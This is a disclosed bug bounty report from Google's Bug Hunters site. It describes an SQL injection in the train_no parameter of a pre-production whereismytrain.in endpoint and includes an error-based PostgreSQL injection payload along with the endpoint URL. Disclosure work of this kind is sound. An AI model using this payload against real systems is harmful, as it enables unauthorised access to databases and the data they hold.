Skip to Content (Press Enter)
Google
Bug Hunters
other in whereismytrain
Reported by:
Vatsal Vaishy
Google VRP
triaged
17:42 | Oct 24, 2019
accepted
01:20 | Oct 25, 2019
fixed
01:38 | Jun 6, 2021
reward decided
$1,337
Summary: Sql Injection (parameter train_no) on subdomain (pre-prod.whereismytrain.in)
Steps to reproduce:
Visit the link
https://pre-prod.whereismytrain.in/mt/submit_change_in_status
which is the fourth on the list which is affected
The parameter is train_no is injectable with Error-Type Postgresql
Detail of the injection to further test or reproduce is
Parameter: train_no (POST)
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: train_no=' AND 5178=CAST((CHR(113)||CHR(113)||CHR(120)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5178=5178) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(98)||CHR(122)||CHR(113)) AS NUMERIC) AND 'PdSo'='PdSo&train_date=
Browser/OS: Chrome/Firefox
Attack scenario:
This subdomain can be reached by a good recon and the directories have to be brute-forced. The application and the owner straightaway looses first two pillars of CIA triad. By letting the application go vulnerable as well as attacker getting a chance to be handy with data.
Acquisition info:
It was acquired in the 2k18 end acc to Crunchbase
登录
使用 Google 账号登录